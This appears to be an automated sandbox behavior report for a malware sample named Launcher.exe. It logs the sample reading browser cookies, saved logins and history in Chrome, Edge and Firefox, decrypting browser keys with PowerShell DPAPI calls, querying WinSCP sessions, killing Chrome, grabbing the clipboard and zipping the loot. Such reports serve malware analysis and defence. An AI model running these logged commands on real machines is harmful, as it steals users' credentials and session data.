          Source: C:\Users\user\Desktop\Launcher.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node.bak
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756 Thread sleep count: 7804 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756 Thread sleep count: 2021 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844 Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4744 Thread sleep count: 1131 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4744 Thread sleep count: 8148 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3000 Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2928 Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300 Thread sleep count: 2452 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300 Thread sleep count: 4698 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132 Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4808 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480 Thread sleep count: 1764 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480 Thread sleep count: 6436 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228 Thread sleep count: 1224 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228 Thread sleep count: 2812 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FFF8F1036D5 GetSystemInfo,29_2_00007FFF8F1036D5
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "hostname"
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser')"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser')"Jump to behavior
          Source: C:\Users\user\Desktop\Launcher.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\HOSTNAME.EXE hostname
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 "
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE00D.tmp" "c:\Users\user\AppData\Local\Temp\0a5bipl0\CSC1B434CDB8C1C4BC4B88560F934C57755.TMP"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'CurrentUser')Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'CurrentUser')Jump to behavior
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,61,130,16,112,18,195,26,29,207,63,21,98,132,223,37,139,82,107,196,95,176,198,140,211,148,154,78,139,79,54,137,72,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,172,204,226,235,98,242,173,94,11,74,163,17,227,79,23,35,174,12,209,102,184,234,6,27,108,229,177,74,21,214,96,29,48,0,0,0,138,70,29,110,236,35,109,126,11,247,125,4,19,211,134,55,97,241,184,139,199,23,247,29,77,33,89,214,170,76,225,241,55,121,39,212,75,108,11,144,73,3,117,161,53,8,90,75,64,0,0,0,177,107,112,232,208,173,34,93,161,233,193,31,174,54,91,224,155,40,73,32,226,208,192,224,52,109,195,100,111,169,198,59,214,120,178,188,63,149,127,69,209,149,90,84,38,62,170,183,190,107,181,191,133,37,17,29,158,241,170,30,12,20,16,214), $null, 'currentuser')"
          Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,114,4,140,248,67,188,140,65,157,38,86,12,121,77,19,231,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,126,97,45,192,134,183,25,101,17,79,235,249,52,13,227,14,126,62,205,194,56,212,59,123,99,59,207,89,244,159,144,195,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,212,178,64,122,216,18,7,230,238,87,71,19,211,53,201,103,190,96,189,181,56,74,8,89,78,145,72,22,6,79,136,145,48,0,0,0,203,249,185,144,145,9,68,172,133,95,28,178,212,148,181,192,247,195,170,89,51,11,52,26,244,33,160,43,48,129,99,159,51,158,23,164,222,50,5,4,145,232,115,109,104,211,188,5,64,0,0,0,127,20,61,102,241,162,30,31,103,79,209,26,60,177,21,19,160,131,165,252,45,223,59,124,63,134,242,86,36,179,77,27,122,80,62,215,210,46,204,86,21,29,122,223,28,132,128,104,1,188,176,126,26,22,23,179,124,254,35,88,67,255,154,4), $null, 'currentuser')"
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\Desktop\Launcher.exe VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp\pkg VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Roaming\temp.ps1 VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies_tmp VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data_tmp VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data_tmp VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies_tmp VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data_tmp VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data_tmp VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History_tmp VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Duck-h4TS\Browsers VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Duck-h4TS\Browsers\bookmarks.json VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Duck-h4TS\Browsers\cards.json VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Duck-h4TS\Browsers\downloads.json VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Duck-3KBP.zip VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
          Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
